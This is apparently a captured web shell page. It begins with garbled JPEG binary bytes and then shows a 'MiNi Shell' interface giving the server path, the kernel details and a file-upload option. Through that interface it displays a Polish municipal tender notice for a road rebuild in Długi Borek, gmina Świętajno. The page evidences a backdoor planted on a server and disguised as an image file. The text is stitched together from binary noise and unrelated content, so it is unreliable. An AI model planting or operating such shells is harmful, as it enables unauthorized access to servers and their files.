JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251107/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251107/0052148501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej od km 0+000 do km 1+192 w miejscowości Długi<br/>Borek, gmina Świętajno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świętajno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743284</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świętajno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">12-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89 623 20 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">89 623 20 76</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@swietajno.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.swietajno.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej od km 0+000 do km 1+192 w miejscowości Długi<br/>Borek, gmina Świętajno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ea207740-1d5b-4a69-9ff0-4cc2f5bccffc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00521485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037919/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa drogi gminnej w miejscowości Długi Borek</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/swietajno_ug <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/swietajno_ug</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) Zasady obowiązujące podczas<br/>przygotowywania ofert<br/>Oferta wraz z załącznikami musi zostać sporządzona w języku polskim, złożona w postaci elektronicznej<br/>oraz podpisana kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem<br/>zaufanym pod rygorem nieważności. Złożenie oferty wymaga od wykonawcy przesłania jej poprzez<br/>Platformę zakupową Zamawiającego dostępną pod adresem:<br/>https://platformazakupowa.pl/pn/swietajno_ug<br/>b) Zasady przygotowania i złożenia oferty za pośrednictwem Platformy:<br/>1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>złożyć ofertę poprzez platformę zakupową Zamawiającego:<br/>https://platformazakupowa.pl/pn/swietajno_ug<br/>2. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na platformę.<br/>3. Wykonawca ma prawo złożyć tylko jedną ofertę. Oferty wykonawcy, który przedłoży więcej niż jedną<br/>ofertę, zostaną odrzucone.<br/>4. Wykonawca składa ofertę wraz z wymaganymi oświadczeniami i dokumentami,<br/>5. Do upływu terminu składania ofert wykonawca może wycofać ofertę</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i<br/>Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.),<br/>dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO<br/>oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. C RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Dostawa<br/>agregatów prądotwórczych na przyczepkach transportowych”</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Te.271.2.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanową roboty budowlane: „Przebudowa drogi gminnej od km 0+000<br/>do km 1+192 w miejscowości Długi Borek, gmina Świętajno”<br/>Wspólny Słownik Zamówień:<br/>Kod CPV:<br/>45000000-7 Roboty budowlane<br/>1) Opis przedmiotu zamówienia stanowi Załącznik nr 1.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru<br/>określają:<br/>a) Dokumentacja projektowa<br/>b) Przedmiar robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów<br/>w kryteriach:<br/>„Łączna cena ofertowa brutto” – C;<br/>„Okres gwarancji” – G;<br/>2. Powyższym kryteriom Zamawiający przypisał następujące znaczenie:<br/>Kryterium Liczba<br/>punktów Sposób oceny wg wzoru<br/>Łączna cena<br/>ofertowa<br/>brutto<br/>60<br/>Cena najtańszej oferty<br/>C = ----------------------------------------- x 60pkt<br/>Cena badanej oferty<br/>Okres<br/>gwarancji 40<br/>Okres gwarancji w badanej ofercie<br/>G = ---------------------------------------------------------- x 40 pkt<br/>Najdłuższy okres gwarancji<br/>spośród badanych ofert<br/>RAZEM 100 ────────────────────<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + G<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji”.<br/>4. Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie<br/>na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona<br/>według wzoru opisanego w tabeli powyżej.<br/>5. Ocena punktowa w kryterium „Okres gwarancji” dokonana zostanie na podstawie okresu gwarancji<br/>wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Minimalny okres gwarancji wynosi 36 msc. (3 lata), maksymalny okres gwarancji wynosi 96 msc.<br/>(8 lat).<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością<br/>do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie PZP, oraz w SWZ i zostanie oceniona jako<br/>najkorzystniejsza w oparciu o podane kryteria wyboru</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże, że:<br/>• jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia na sumę gwarancyjną minimum 1 400 000,00 zł.<br/>• posiada na rachunku bankowym środki finansowe o wysokości min. 1 400 000,00 zł lub zdolność<br/>kredytową do wysokości min. 1 400 000,00 zł lub środki na rachunku bankowym wraz z zdolnością<br/>kredytową do łącznej wartości 1 400 000,00 zł.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>• wykonał terminowo co najmniej dwie roboty budowlane na kwotę łącznie minimum 1 400 000,00<br/>złotych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, tj. co najmniej dwa zadania polegające<br/>na budowie, przebudowie lub rozbudowie dróg o nawierzchni gruntowej/żwirowej na nawierzchnię<br/>asfaltową wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem<br/>dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w<br/>sposób terminowy, należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki<br/>budowlanej i prawidłowo ukończone.<br/>• dysponuje potencjałem kadrowym niezbędnym do realizacji zamówienia<br/>tj. co najmniej jedną osobą:<br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi, tj. posiadającą<br/>uprawnienia budowlane w specjalności drogowej wydane na podstawie ustawy Prawo Budowlane<br/>(t.j. Dz. U. z 2024 r. poz. 725 t.j.) lub odpowiadające im równoważne uprawnienia w tej specjalności,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim<br/>Prawem Budowlanym lub zagraniczne uprawnienia uznane zgodnie z polskim Prawem Budowlanym,<br/>uwzględniając postanowienia ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023 r. poz. 334 t.j.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, wraz ze<br/>złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą<br/>nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (Załącznik nr 7).<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy<br/>z wykonawców wspólnie ubiegający się o zamówienie,<br/>b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających,<br/>że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału<br/>w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie<br/>w sprawie spłat tych należności,<br/>c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega<br/>z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1<br/>ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania<br/>z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć<br/>wymaganego przez Zamawiającego podmiotowego środka dowodowego, składa inne podmiotowe<br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu.<br/>b) informacji banku lub spółdzielczej kasy oszczędnościowo kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału<br/>w postępowaniu; Należy wykazać posiadanie na rachunku Wykonawcy, środków finansowych<br/>o wysokości min. 1 400 000,00 zł. lub należy załączyć oświadczenie w/w podmiotów o zdolności<br/>kredytowej do wysokości min. 1 400 000,00 zł. lub posiadane środki na rachunku bankowym wraz<br/>z zdolnością kredytową do łącznej wartości 1 400 000,00 zł.<br/>c) wykaz co najmniej dwóch robót budowlanych wykonanych terminowo na kwotę łącznie minimum<br/>1 400 000,00 zł oraz wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane – wg<br/>wzoru załącznika nr 8 do SWZ wraz z załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – inne dokumenty,<br/>d) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę, jakości lub kierowanie robotami budowlanymi, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami Wykonawca nie jest zobowiązany do<br/>złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże<br/>te środki oraz potwierdzi ich prawidłowość i aktualność. (załącznik nr 9 do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> ) Formularz ofertowy – Załącznik nr 2<br/>a) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu - Załącznik nr 5,<br/>b) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu - Załącznik nr 6 do SWZ,<br/>(w przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia, o których mowa<br/>wyżej składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie<br/>te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu zakresie,<br/>w jakim każdy wykonawca wykazuje spełnienie warunków udziału),<br/>c) Kosztorys ofertowy<br/>d) Wykonawca, w przypadku polegania na zdolności podmiotów udostępniających zasoby, przedstawia<br/>także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu, w zakresie, jakim<br/>Wykonawca powołuje się na jego zasoby,<br/>e) Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) wnosi się w takiej formie<br/>jakiej zostało ustanowione przez Gwaranta (wystawcę gwarancji/ poręczenia), tj. oryginału<br/>dokumentu,<br/>f) Oświadczenie RODO - Załącznik nr 10,<br/>h) Oświadczenie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>oraz z art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków<br/>ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L<br/>229 z 31.7.2014, str. 1), dalej: rozporządzenie 833/2014, w brzmieniu nadanym rozporządzeniem<br/>Rady (UE) 2022/576 w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków<br/>ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L<br/>111 z 8.4.2022, str. 1) stanowiące załącznik nr 11 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 16 700,00 zł (słownie: szesnaście<br/>tysięcy siedemset złotych 00/100). Wadium należy wnieść przed upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach, zgodnie z art. 97 ustawy Pzp<br/>tj.:<br/>- pieniądzu;<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Wadium w formie pieniądza 